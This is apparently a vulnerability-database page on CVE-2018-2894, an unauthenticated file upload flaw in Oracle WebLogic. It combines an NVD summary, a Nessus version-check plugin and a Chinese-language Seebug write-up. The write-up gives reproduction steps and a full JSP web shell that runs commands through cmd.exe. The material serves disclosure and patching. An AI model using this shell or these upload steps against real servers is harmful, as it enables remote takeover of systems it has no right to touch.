Vulnerabilities > CVE-2018-2894 - Unspecified vulnerability in Oracle Weblogic Server

CVSS 9.8 - CRITICAL

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

HIGH

Integrity impact

HIGH

Availability impact

HIGH

network

low complexity

oracle

critical

nessus

NVD

Published: 2018-07-18

Updated: 2019-10-03

Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Vulnerable Configurations

Part	Description	Count
Application	Oracle Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.2.0 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.2.1.3	4

D2sec

name	Oracle WebLogic Server WLS File Upload
url	http://www.d2sec.com/exploits/oracle_weblogic_server_wls_file_upload.html

Nessus

NASL family	Misc.
NASL id	ORACLE_WEBLOGIC_SERVER_CPU_JUL_2018.NASL
description	The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities: - An unspecified vulnerability in the Spring Framework (Sample Apps) subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker to takeover a WebLogic server. (CVE-2018-1275) - An unspecified vulnerability in the WLS Core Components subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker to takeover a WebLogic server. (CVE-2018-2893) - An unspecified vulnerability in the WLS - Web Services subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker with HTTP access to compromise and takeover a WebLogic server. (CVE-2018-2894) In addition, Oracle WebLogic Server is affected by several other lower scoring vulnerabilities in the WLS Core Components, JSF, SAML, and Console (jackson-databind) subcomponents. Note that Nessus has not tested for these issues but has instead relied only on the application
last seen	2020-06-01
modified	2020-06-02
plugin id	111209
published	2018-07-20
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/111209
title	Oracle WebLogic Server Multiple Vulnerabilities (July 2018 CPU)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(111209); script_version("1.15"); script_cvs_date("Date: 2019/04/30 14:00:04"); script_cve_id( "CVE-2018-1275", "CVE-2018-2893", "CVE-2018-2894", "CVE-2018-2933", "CVE-2018-2935", "CVE-2018-2987", "CVE-2018-2998", "CVE-2018-7489" ); script_bugtraq_id( 103771, 103203, 104817 ); script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (July 2018 CPU)"); script_summary(english:"Checks for the patch."); script_set_attribute(attribute:"synopsis", value: "An application server installed on the remote host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities: - An unspecified vulnerability in the Spring Framework (Sample Apps) subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker to takeover a WebLogic server. (CVE-2018-1275) - An unspecified vulnerability in the WLS Core Components subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker to takeover a WebLogic server. (CVE-2018-2893) - An unspecified vulnerability in the WLS - Web Services subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker with HTTP access to compromise and takeover a WebLogic server. (CVE-2018-2894) In addition, Oracle WebLogic Server is affected by several other lower scoring vulnerabilities in the WLS Core Components, JSF, SAML, and Console (jackson-databind) subcomponents. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number." ); # http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?50f36723"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch according to the July 2018 Oracle Critical Patch Update advisory. Refer to Oracle for any additional patch instructions or mitigation options."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-1275"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Oracle WebLogic Server WLS File Upload"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2018/07/17"); script_set_attribute(attribute:"patch_publication_date", value:"2018/07/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/07/20"); script_set_attribute(attribute:"agent", value:"all"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_weblogic_server_installed.nbin", "os_fingerprint.nasl"); script_require_keys("installed_sw/Oracle WebLogic Server"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("install_func.inc"); include("obj.inc"); include("spad_log_func.inc"); app_name = "Oracle WebLogic Server"; install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE); ohome = install["Oracle Home"]; subdir = install["path"]; version = install["version"]; fix = NULL; fix_ver = NULL; spad_log(message:"checking version [" + version + "]"); # individual security patches if (version =~ "^12\.2\.1\.3($\|[^0-9])") { fix_ver = "12.2.1.3.180717"; fix = make_list("27912627"); } else if (version =~ "^12\.2\.1\.2($\|[^0-9])") { fix_ver = "12.2.1.2.180717"; fix = make_list("27741413"); } else if (version =~ "^12\.1\.3\.") { fix_ver = "12.1.3.0.180717"; fix = make_list("27919943"); } else if (version =~ "^10\.3\.6\.") { fix_ver = "10.3.6.0.180717"; fix = make_list("B47X"); # patchid is obtained from the readme and 10.3.6.x assets are different } else audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir); spad_log(message:"checking fix [" + obj_rep(fix) + "]"); PATCHED=FALSE; # Iterate over the list of patches and check the install for the patchID foreach id (fix) { spad_log(message:"Checking fix id: [" + id +"]"); if (install[id]) { PATCHED=TRUE; break; } } VULN=FALSE; if (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1) VULN=TRUE; if (PATCHED \|\| !VULN) audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir); os = get_kb_item_or_exit("Host/OS"); if ('windows' >< tolower(os)) { port = get_kb_item("SMB/transport"); if (!port) port = 445; } else port = 0; report = '\n Oracle Home : ' + ohome + '\n Install path : ' + subdir + '\n Version : ' + version + '\n Fixes : ' + join(sep:", ", fix); security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);

Seebug

bulletinFamily	exploit
description	漏洞影响版本：10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 下载地址：http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip ### 漏洞复现服务启动后，访问 http://localhost:7001/ws_utc/config.do ![](https://images.seebug.org/1531998939378) 可以将当前的工作目录为更改为其他目录。以本地环境为例，可以部署到 ``` C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war``` 选择右边的安全栏目，添加JKS Keystores上传文件。假设chybeta.jsp内容如下： ``` <%@ page import="java.util.,java.io.,java.net."%> <HTML><BODY> <FORM METHOD="POST" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "\n<BR>"); Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> ``` 抓包获取到时间戳为`1531987145013`，则上传到的位置即`config\keystore\1531987145013_chybeta.jsp` ![](https://images.seebug.org/1531998985265-w331s) 访问`http://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp` ### 简要漏洞分析在ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59: ``` public void changeWorkDir(String path) { String[] oldPaths = this.getRelatedPaths(); if (this.testPageProvider.getWsImplType() == ImplType.JRF) { this.isWorkDirChangeable = false; this.isWorkDirWritable = isDirWritable(path); this.isWorkDirChangeable = true; this.setTestClientWorkDir(path); } else { this.persistWorkDir(path); this.init(); } if (this.isWorkDirWritable) { String[] newPaths = this.getRelatedPaths(); moveDirs(oldPaths, newPaths); } else { Logger.fine("[INFO] Newly specified TestClient Working Dir is readonly. Won't move the configuration stuff to new path."); } } ``` 此函数用于改变工作目录，但其中并未做任何检测。在ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181中： ``` @Path("/keystore") @POST @Produces({"application/xml", "application/json"}) @Consumes({"multipart/form-data"}) public Response editKeyStoreSettingByMultiPart(FormDataMultiPart formPartParams) { if (!RequestUtil.isRequstedByAdmin(this.request)) { return Response.status(Status.FORBIDDEN).build(); } else { if (TestClientRT.isVerbose()) { Logger.fine("calling SettingResource.addKeyStoreSettingByMultiPart"); } String currentTimeValue = "" + (new Date()).getTime(); KeyValuesMap<String, String> formParams = RSDataHelper.getInstance().convertFormDataMultiPart(formPartParams, true, TestClientRT.getKeyStorePath(), currentTimeValue); .... } } ``` 跟入ws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31 ``` public static String getKeyStorePath() { return getConfigDir() + File.separator + "keystore"; } ``` 得到要写入的路径storePath。在ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145: ``` public KeyValuesMap<String, String> convertFormDataMultiPart(FormDataMultiPart formPartParams, boolean isExtactAttachment, String path, String fileNamePrefix) { ... if (attachName != null && attachName.trim().length() > 0) { if (attachName != null && attachName.trim().length() != 0) { attachName = this.refactorAttachName(attachName); if (fileNamePrefix == null) { fileNamePrefix = key; } String filename = (new File(storePath, fileNamePrefix + "_" + attachName)).getAbsolutePath(); kvMap.addValue(key, filename); if (isExtactAttachment) { this.saveAttachedFile(filename, (InputStream)bodyPart.getValueAs(InputStream.class)); } } } ... } ``` 把上传文件的内容传到了storePath目录里，文件名满足fileNamePrefix + "_" + attachName。这过程没有任何过滤和检查：）... 条件：需要知道部署应用的web目录 * ws_utc/config.do在开发模式下无需认证，在生产模式下需要认证。具体可见Oracle® Fusion Middleware Administering Web Services
id	SSV:97423
last seen	2018-07-21
modified	2018-07-19
published	2018-07-19
reporter	My Seebug
title	WebLogic 任意文件上传漏洞(CVE-2018-2894)

Summary

Vulnerable Configurations

D2sec

Nessus

Seebug

References